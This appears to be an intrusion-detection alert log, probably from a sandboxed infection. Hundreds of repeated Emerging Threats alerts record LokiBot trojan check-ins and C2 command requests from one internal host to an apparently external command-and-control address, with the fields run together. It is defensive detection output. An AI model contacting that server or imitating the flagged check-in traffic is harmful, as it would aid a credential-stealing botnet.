                                11/22/21-15:32:05.935576TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M14999980192.168.11.20192.185.217.246
                                11/22/21-15:32:05.935576TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)4999980192.168.11.20192.185.217.246
                                11/22/21-15:32:05.935576TCP2025381ET TROJAN LokiBot Checkin4999980192.168.11.20192.185.217.246
                                11/22/21-15:32:05.935576TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M24999980192.168.11.20192.185.217.246
                                11/22/21-15:32:06.769989TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000080192.168.11.20192.185.217.246
                                11/22/21-15:32:06.769989TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000080192.168.11.20192.185.217.246
                                11/22/21-15:32:06.769989TCP2025381ET TROJAN LokiBot Checkin5000080192.168.11.20192.185.217.246
                                11/22/21-15:32:06.769989TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000080192.168.11.20192.185.217.246
                                11/22/21-15:32:07.714965TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000180192.168.11.20192.185.217.246
                                11/22/21-15:32:07.714965TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000180192.168.11.20192.185.217.246
                                11/22/21-15:32:07.714965TCP2025381ET TROJAN LokiBot Checkin5000180192.168.11.20192.185.217.246
                                11/22/21-15:32:07.714965TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000180192.168.11.20192.185.217.246
                                11/22/21-15:32:08.577568TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000280192.168.11.20192.185.217.246
                                11/22/21-15:32:08.577568TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000280192.168.11.20192.185.217.246
                                11/22/21-15:32:08.577568TCP2025381ET TROJAN LokiBot Checkin5000280192.168.11.20192.185.217.246
                                11/22/21-15:32:08.577568TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000280192.168.11.20192.185.217.246
                                11/22/21-15:32:09.359679TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000380192.168.11.20192.185.217.246
                                11/22/21-15:32:09.359679TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000380192.168.11.20192.185.217.246
                                11/22/21-15:32:09.359679TCP2025381ET TROJAN LokiBot Checkin5000380192.168.11.20192.185.217.246
                                11/22/21-15:32:09.359679TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000380192.168.11.20192.185.217.246
                                11/22/21-15:32:10.196935TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000480192.168.11.20192.185.217.246
                                11/22/21-15:32:10.196935TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000480192.168.11.20192.185.217.246
                                11/22/21-15:32:10.196935TCP2025381ET TROJAN LokiBot Checkin5000480192.168.11.20192.185.217.246
                                11/22/21-15:32:10.196935TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000480192.168.11.20192.185.217.246
                                11/22/21-15:32:11.039158TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000580192.168.11.20192.185.217.246
                                11/22/21-15:32:11.039158TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000580192.168.11.20192.185.217.246
                                11/22/21-15:32:11.039158TCP2025381ET TROJAN LokiBot Checkin5000580192.168.11.20192.185.217.246
                                11/22/21-15:32:11.039158TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000580192.168.11.20192.185.217.246
                                11/22/21-15:32:11.829931TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000680192.168.11.20192.185.217.246
                                11/22/21-15:32:11.829931TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000680192.168.11.20192.185.217.246
                                11/22/21-15:32:11.829931TCP2025381ET TROJAN LokiBot Checkin5000680192.168.11.20192.185.217.246
                                11/22/21-15:32:11.829931TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000680192.168.11.20192.185.217.246
                                11/22/21-15:32:12.718771TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000780192.168.11.20192.185.217.246
                                11/22/21-15:32:12.718771TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000780192.168.11.20192.185.217.246
                                11/22/21-15:32:12.718771TCP2025381ET TROJAN LokiBot Checkin5000780192.168.11.20192.185.217.246
                                11/22/21-15:32:12.718771TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000780192.168.11.20192.185.217.246
                                11/22/21-15:32:13.544515TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000880192.168.11.20192.185.217.246
                                11/22/21-15:32:13.544515TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000880192.168.11.20192.185.217.246
                                11/22/21-15:32:13.544515TCP2025381ET TROJAN LokiBot Checkin5000880192.168.11.20192.185.217.246
                                11/22/21-15:32:13.544515TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000880192.168.11.20192.185.217.246
                                11/22/21-15:32:14.363570TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15000980192.168.11.20192.185.217.246
                                11/22/21-15:32:14.363570TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5000980192.168.11.20192.185.217.246
                                11/22/21-15:32:14.363570TCP2025381ET TROJAN LokiBot Checkin5000980192.168.11.20192.185.217.246
                                11/22/21-15:32:14.363570TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25000980192.168.11.20192.185.217.246
                                11/22/21-15:32:15.199945TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001080192.168.11.20192.185.217.246
                                11/22/21-15:32:15.199945TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001080192.168.11.20192.185.217.246
                                11/22/21-15:32:15.199945TCP2025381ET TROJAN LokiBot Checkin5001080192.168.11.20192.185.217.246
                                11/22/21-15:32:15.199945TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001080192.168.11.20192.185.217.246
                                11/22/21-15:32:16.047013TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001180192.168.11.20192.185.217.246
                                11/22/21-15:32:16.047013TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001180192.168.11.20192.185.217.246
                                11/22/21-15:32:16.047013TCP2025381ET TROJAN LokiBot Checkin5001180192.168.11.20192.185.217.246
                                11/22/21-15:32:16.047013TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001180192.168.11.20192.185.217.246
                                11/22/21-15:32:16.869696TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001280192.168.11.20192.185.217.246
                                11/22/21-15:32:16.869696TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001280192.168.11.20192.185.217.246
                                11/22/21-15:32:16.869696TCP2025381ET TROJAN LokiBot Checkin5001280192.168.11.20192.185.217.246
                                11/22/21-15:32:16.869696TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001280192.168.11.20192.185.217.246
                                11/22/21-15:32:17.706048TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001380192.168.11.20192.185.217.246
                                11/22/21-15:32:17.706048TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001380192.168.11.20192.185.217.246
                                11/22/21-15:32:17.706048TCP2025381ET TROJAN LokiBot Checkin5001380192.168.11.20192.185.217.246
                                11/22/21-15:32:17.706048TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001380192.168.11.20192.185.217.246
                                11/22/21-15:32:18.525083TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001480192.168.11.20192.185.217.246
                                11/22/21-15:32:18.525083TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001480192.168.11.20192.185.217.246
                                11/22/21-15:32:18.525083TCP2025381ET TROJAN LokiBot Checkin5001480192.168.11.20192.185.217.246
                                11/22/21-15:32:18.525083TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001480192.168.11.20192.185.217.246
                                11/22/21-15:32:19.311133TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001580192.168.11.20192.185.217.246
                                11/22/21-15:32:19.311133TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001580192.168.11.20192.185.217.246
                                11/22/21-15:32:19.311133TCP2025381ET TROJAN LokiBot Checkin5001580192.168.11.20192.185.217.246
                                11/22/21-15:32:19.311133TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001580192.168.11.20192.185.217.246
                                11/22/21-15:32:20.130578TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001680192.168.11.20192.185.217.246
                                11/22/21-15:32:20.130578TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001680192.168.11.20192.185.217.246
                                11/22/21-15:32:20.130578TCP2025381ET TROJAN LokiBot Checkin5001680192.168.11.20192.185.217.246
                                11/22/21-15:32:20.130578TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001680192.168.11.20192.185.217.246
                                11/22/21-15:32:20.853977TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001780192.168.11.20192.185.217.246
                                11/22/21-15:32:20.853977TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001780192.168.11.20192.185.217.246
                                11/22/21-15:32:20.853977TCP2025381ET TROJAN LokiBot Checkin5001780192.168.11.20192.185.217.246
                                11/22/21-15:32:20.853977TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001780192.168.11.20192.185.217.246
                                11/22/21-15:32:21.685625TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001880192.168.11.20192.185.217.246
                                11/22/21-15:32:21.685625TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001880192.168.11.20192.185.217.246
                                11/22/21-15:32:21.685625TCP2025381ET TROJAN LokiBot Checkin5001880192.168.11.20192.185.217.246
                                11/22/21-15:32:21.685625TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001880192.168.11.20192.185.217.246
                                11/22/21-15:32:22.577250TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15001980192.168.11.20192.185.217.246
                                11/22/21-15:32:22.577250TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5001980192.168.11.20192.185.217.246
                                11/22/21-15:32:22.577250TCP2025381ET TROJAN LokiBot Checkin5001980192.168.11.20192.185.217.246
                                11/22/21-15:32:22.577250TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25001980192.168.11.20192.185.217.246
                                11/22/21-15:32:23.316326TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002080192.168.11.20192.185.217.246
                                11/22/21-15:32:23.316326TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002080192.168.11.20192.185.217.246
                                11/22/21-15:32:23.316326TCP2025381ET TROJAN LokiBot Checkin5002080192.168.11.20192.185.217.246
                                11/22/21-15:32:23.316326TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002080192.168.11.20192.185.217.246
                                11/22/21-15:32:24.148117TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002180192.168.11.20192.185.217.246
                                11/22/21-15:32:24.148117TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002180192.168.11.20192.185.217.246
                                11/22/21-15:32:24.148117TCP2025381ET TROJAN LokiBot Checkin5002180192.168.11.20192.185.217.246
                                11/22/21-15:32:24.148117TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002180192.168.11.20192.185.217.246
                                11/22/21-15:32:24.996619TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002280192.168.11.20192.185.217.246
                                11/22/21-15:32:24.996619TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002280192.168.11.20192.185.217.246
                                11/22/21-15:32:24.996619TCP2025381ET TROJAN LokiBot Checkin5002280192.168.11.20192.185.217.246
                                11/22/21-15:32:24.996619TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002280192.168.11.20192.185.217.246
                                11/22/21-15:32:25.791047TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002380192.168.11.20192.185.217.246
                                11/22/21-15:32:25.791047TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002380192.168.11.20192.185.217.246
                                11/22/21-15:32:25.791047TCP2025381ET TROJAN LokiBot Checkin5002380192.168.11.20192.185.217.246
                                11/22/21-15:32:25.791047TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002380192.168.11.20192.185.217.246
                                11/22/21-15:32:26.551736TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002480192.168.11.20192.185.217.246
                                11/22/21-15:32:26.551736TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002480192.168.11.20192.185.217.246
                                11/22/21-15:32:26.551736TCP2025381ET TROJAN LokiBot Checkin5002480192.168.11.20192.185.217.246
                                11/22/21-15:32:26.551736TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002480192.168.11.20192.185.217.246
                                11/22/21-15:32:27.404429TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002580192.168.11.20192.185.217.246
                                11/22/21-15:32:27.404429TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002580192.168.11.20192.185.217.246
                                11/22/21-15:32:27.404429TCP2025381ET TROJAN LokiBot Checkin5002580192.168.11.20192.185.217.246
                                11/22/21-15:32:27.404429TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002580192.168.11.20192.185.217.246
                                11/22/21-15:32:28.370436TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002680192.168.11.20192.185.217.246
                                11/22/21-15:32:28.370436TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002680192.168.11.20192.185.217.246
                                11/22/21-15:32:28.370436TCP2025381ET TROJAN LokiBot Checkin5002680192.168.11.20192.185.217.246
                                11/22/21-15:32:28.370436TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002680192.168.11.20192.185.217.246
                                11/22/21-15:32:29.173776TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002780192.168.11.20192.185.217.246
                                11/22/21-15:32:29.173776TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002780192.168.11.20192.185.217.246
                                11/22/21-15:32:29.173776TCP2025381ET TROJAN LokiBot Checkin5002780192.168.11.20192.185.217.246
                                11/22/21-15:32:29.173776TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002780192.168.11.20192.185.217.246
                                11/22/21-15:32:29.937674TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002880192.168.11.20192.185.217.246
                                11/22/21-15:32:29.937674TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002880192.168.11.20192.185.217.246
                                11/22/21-15:32:29.937674TCP2025381ET TROJAN LokiBot Checkin5002880192.168.11.20192.185.217.246
                                11/22/21-15:32:29.937674TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002880192.168.11.20192.185.217.246
                                11/22/21-15:32:30.809686TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15002980192.168.11.20192.185.217.246
                                11/22/21-15:32:30.809686TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5002980192.168.11.20192.185.217.246
                                11/22/21-15:32:30.809686TCP2025381ET TROJAN LokiBot Checkin5002980192.168.11.20192.185.217.246
                                11/22/21-15:32:30.809686TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25002980192.168.11.20192.185.217.246
                                11/22/21-15:32:31.593341TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003080192.168.11.20192.185.217.246
                                11/22/21-15:32:31.593341TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003080192.168.11.20192.185.217.246
                                11/22/21-15:32:31.593341TCP2025381ET TROJAN LokiBot Checkin5003080192.168.11.20192.185.217.246
                                11/22/21-15:32:31.593341TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003080192.168.11.20192.185.217.246
                                11/22/21-15:32:32.355965TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003180192.168.11.20192.185.217.246
                                11/22/21-15:32:32.355965TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003180192.168.11.20192.185.217.246
                                11/22/21-15:32:32.355965TCP2025381ET TROJAN LokiBot Checkin5003180192.168.11.20192.185.217.246
                                11/22/21-15:32:32.355965TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003180192.168.11.20192.185.217.246
                                11/22/21-15:32:33.167437TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003280192.168.11.20192.185.217.246
                                11/22/21-15:32:33.167437TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003280192.168.11.20192.185.217.246
                                11/22/21-15:32:33.167437TCP2025381ET TROJAN LokiBot Checkin5003280192.168.11.20192.185.217.246
                                11/22/21-15:32:33.167437TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003280192.168.11.20192.185.217.246
                                11/22/21-15:32:33.978440TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003380192.168.11.20192.185.217.246
                                11/22/21-15:32:33.978440TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003380192.168.11.20192.185.217.246
                                11/22/21-15:32:33.978440TCP2025381ET TROJAN LokiBot Checkin5003380192.168.11.20192.185.217.246
                                11/22/21-15:32:33.978440TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003380192.168.11.20192.185.217.246
                                11/22/21-15:32:34.838886TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003480192.168.11.20192.185.217.246
                                11/22/21-15:32:34.838886TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003480192.168.11.20192.185.217.246
                                11/22/21-15:32:34.838886TCP2025381ET TROJAN LokiBot Checkin5003480192.168.11.20192.185.217.246
                                11/22/21-15:32:34.838886TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003480192.168.11.20192.185.217.246
                                11/22/21-15:32:35.657636TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003580192.168.11.20192.185.217.246
                                11/22/21-15:32:35.657636TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003580192.168.11.20192.185.217.246
                                11/22/21-15:32:35.657636TCP2025381ET TROJAN LokiBot Checkin5003580192.168.11.20192.185.217.246
                                11/22/21-15:32:35.657636TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003580192.168.11.20192.185.217.246
                                11/22/21-15:32:36.485301TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003680192.168.11.20192.185.217.246
                                11/22/21-15:32:36.485301TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003680192.168.11.20192.185.217.246
                                11/22/21-15:32:36.485301TCP2025381ET TROJAN LokiBot Checkin5003680192.168.11.20192.185.217.246
                                11/22/21-15:32:36.485301TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003680192.168.11.20192.185.217.246
                                11/22/21-15:32:37.229667TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003780192.168.11.20192.185.217.246
                                11/22/21-15:32:37.229667TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003780192.168.11.20192.185.217.246
                                11/22/21-15:32:37.229667TCP2025381ET TROJAN LokiBot Checkin5003780192.168.11.20192.185.217.246
                                11/22/21-15:32:37.229667TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003780192.168.11.20192.185.217.246
                                11/22/21-15:32:38.046982TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003880192.168.11.20192.185.217.246
                                11/22/21-15:32:38.046982TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003880192.168.11.20192.185.217.246
                                11/22/21-15:32:38.046982TCP2025381ET TROJAN LokiBot Checkin5003880192.168.11.20192.185.217.246
                                11/22/21-15:32:38.046982TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003880192.168.11.20192.185.217.246
                                11/22/21-15:32:38.882231TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15003980192.168.11.20192.185.217.246
                                11/22/21-15:32:38.882231TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5003980192.168.11.20192.185.217.246
                                11/22/21-15:32:38.882231TCP2025381ET TROJAN LokiBot Checkin5003980192.168.11.20192.185.217.246
                                11/22/21-15:32:38.882231TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25003980192.168.11.20192.185.217.246
                                11/22/21-15:32:39.734037TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004080192.168.11.20192.185.217.246
                                11/22/21-15:32:39.734037TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004080192.168.11.20192.185.217.246
                                11/22/21-15:32:39.734037TCP2025381ET TROJAN LokiBot Checkin5004080192.168.11.20192.185.217.246
                                11/22/21-15:32:39.734037TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004080192.168.11.20192.185.217.246
                                11/22/21-15:32:40.497478TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004180192.168.11.20192.185.217.246
                                11/22/21-15:32:40.497478TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004180192.168.11.20192.185.217.246
                                11/22/21-15:32:40.497478TCP2025381ET TROJAN LokiBot Checkin5004180192.168.11.20192.185.217.246
                                11/22/21-15:32:40.497478TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004180192.168.11.20192.185.217.246
                                11/22/21-15:32:41.308972TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004280192.168.11.20192.185.217.246
                                11/22/21-15:32:41.308972TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004280192.168.11.20192.185.217.246
                                11/22/21-15:32:41.308972TCP2025381ET TROJAN LokiBot Checkin5004280192.168.11.20192.185.217.246
                                11/22/21-15:32:41.308972TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004280192.168.11.20192.185.217.246
                                11/22/21-15:32:42.129836TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004380192.168.11.20192.185.217.246
                                11/22/21-15:32:42.129836TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004380192.168.11.20192.185.217.246
                                11/22/21-15:32:42.129836TCP2025381ET TROJAN LokiBot Checkin5004380192.168.11.20192.185.217.246
                                11/22/21-15:32:42.129836TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004380192.168.11.20192.185.217.246
                                11/22/21-15:32:42.896557TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004480192.168.11.20192.185.217.246
                                11/22/21-15:32:42.896557TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004480192.168.11.20192.185.217.246
                                11/22/21-15:32:42.896557TCP2025381ET TROJAN LokiBot Checkin5004480192.168.11.20192.185.217.246
                                11/22/21-15:32:42.896557TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004480192.168.11.20192.185.217.246
                                11/22/21-15:32:43.715424TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004580192.168.11.20192.185.217.246
                                11/22/21-15:32:43.715424TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004580192.168.11.20192.185.217.246
                                11/22/21-15:32:43.715424TCP2025381ET TROJAN LokiBot Checkin5004580192.168.11.20192.185.217.246
                                11/22/21-15:32:43.715424TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004580192.168.11.20192.185.217.246
                                11/22/21-15:32:44.557431TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004680192.168.11.20192.185.217.246
                                11/22/21-15:32:44.557431TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004680192.168.11.20192.185.217.246
                                11/22/21-15:32:44.557431TCP2025381ET TROJAN LokiBot Checkin5004680192.168.11.20192.185.217.246
                                11/22/21-15:32:44.557431TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004680192.168.11.20192.185.217.246
                                11/22/21-15:32:45.364335TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004780192.168.11.20192.185.217.246
                                11/22/21-15:32:45.364335TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004780192.168.11.20192.185.217.246
                                11/22/21-15:32:45.364335TCP2025381ET TROJAN LokiBot Checkin5004780192.168.11.20192.185.217.246
                                11/22/21-15:32:45.364335TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004780192.168.11.20192.185.217.246
                                11/22/21-15:32:46.161271TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004880192.168.11.20192.185.217.246
                                11/22/21-15:32:46.161271TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004880192.168.11.20192.185.217.246
                                11/22/21-15:32:46.161271TCP2025381ET TROJAN LokiBot Checkin5004880192.168.11.20192.185.217.246
                                11/22/21-15:32:46.161271TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004880192.168.11.20192.185.217.246
                                11/22/21-15:32:47.013476TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15004980192.168.11.20192.185.217.246
                                11/22/21-15:32:47.013476TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5004980192.168.11.20192.185.217.246
                                11/22/21-15:32:47.013476TCP2025381ET TROJAN LokiBot Checkin5004980192.168.11.20192.185.217.246
                                11/22/21-15:32:47.013476TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25004980192.168.11.20192.185.217.246
                                11/22/21-15:32:47.831463TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005080192.168.11.20192.185.217.246
                                11/22/21-15:32:47.831463TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005080192.168.11.20192.185.217.246
                                11/22/21-15:32:47.831463TCP2025381ET TROJAN LokiBot Checkin5005080192.168.11.20192.185.217.246
                                11/22/21-15:32:47.831463TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005080192.168.11.20192.185.217.246
                                11/22/21-15:32:48.637639TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005180192.168.11.20192.185.217.246
                                11/22/21-15:32:48.637639TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005180192.168.11.20192.185.217.246
                                11/22/21-15:32:48.637639TCP2025381ET TROJAN LokiBot Checkin5005180192.168.11.20192.185.217.246
                                11/22/21-15:32:48.637639TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005180192.168.11.20192.185.217.246
                                11/22/21-15:32:49.425049TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005280192.168.11.20192.185.217.246
                                11/22/21-15:32:49.425049TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005280192.168.11.20192.185.217.246
                                11/22/21-15:32:49.425049TCP2025381ET TROJAN LokiBot Checkin5005280192.168.11.20192.185.217.246
                                11/22/21-15:32:49.425049TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005280192.168.11.20192.185.217.246
                                11/22/21-15:32:50.252080TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005380192.168.11.20192.185.217.246
                                11/22/21-15:32:50.252080TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005380192.168.11.20192.185.217.246
                                11/22/21-15:32:50.252080TCP2025381ET TROJAN LokiBot Checkin5005380192.168.11.20192.185.217.246
                                11/22/21-15:32:50.252080TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005380192.168.11.20192.185.217.246
                                11/22/21-15:32:51.018055TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005480192.168.11.20192.185.217.246
                                11/22/21-15:32:51.018055TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005480192.168.11.20192.185.217.246
                                11/22/21-15:32:51.018055TCP2025381ET TROJAN LokiBot Checkin5005480192.168.11.20192.185.217.246
                                11/22/21-15:32:51.018055TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005480192.168.11.20192.185.217.246
                                11/22/21-15:32:51.820206TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005580192.168.11.20192.185.217.246
                                11/22/21-15:32:51.820206TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005580192.168.11.20192.185.217.246
                                11/22/21-15:32:51.820206TCP2025381ET TROJAN LokiBot Checkin5005580192.168.11.20192.185.217.246
                                11/22/21-15:32:51.820206TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005580192.168.11.20192.185.217.246
                                11/22/21-15:32:52.633623TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005680192.168.11.20192.185.217.246
                                11/22/21-15:32:52.633623TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005680192.168.11.20192.185.217.246
                                11/22/21-15:32:52.633623TCP2025381ET TROJAN LokiBot Checkin5005680192.168.11.20192.185.217.246
                                11/22/21-15:32:52.633623TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005680192.168.11.20192.185.217.246
                                11/22/21-15:32:53.441472TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005780192.168.11.20192.185.217.246
                                11/22/21-15:32:53.441472TCP2021641ET TROJAN LokiBot User-Agent (Charon/Inferno)5005780192.168.11.20192.185.217.246
                                11/22/21-15:32:53.441472TCP2025381ET TROJAN LokiBot Checkin5005780192.168.11.20192.185.217.246
                                11/22/21-15:32:53.441472TCP2024318ET TROJAN LokiBot Request for C2 Commands Detected M25005780192.168.11.20192.185.217.246
                                11/22/21-15:32:54.224289TCP2024313ET TROJAN LokiBot Request for C2 Commands Detected M15005880192.168.11.20192.185.217.246
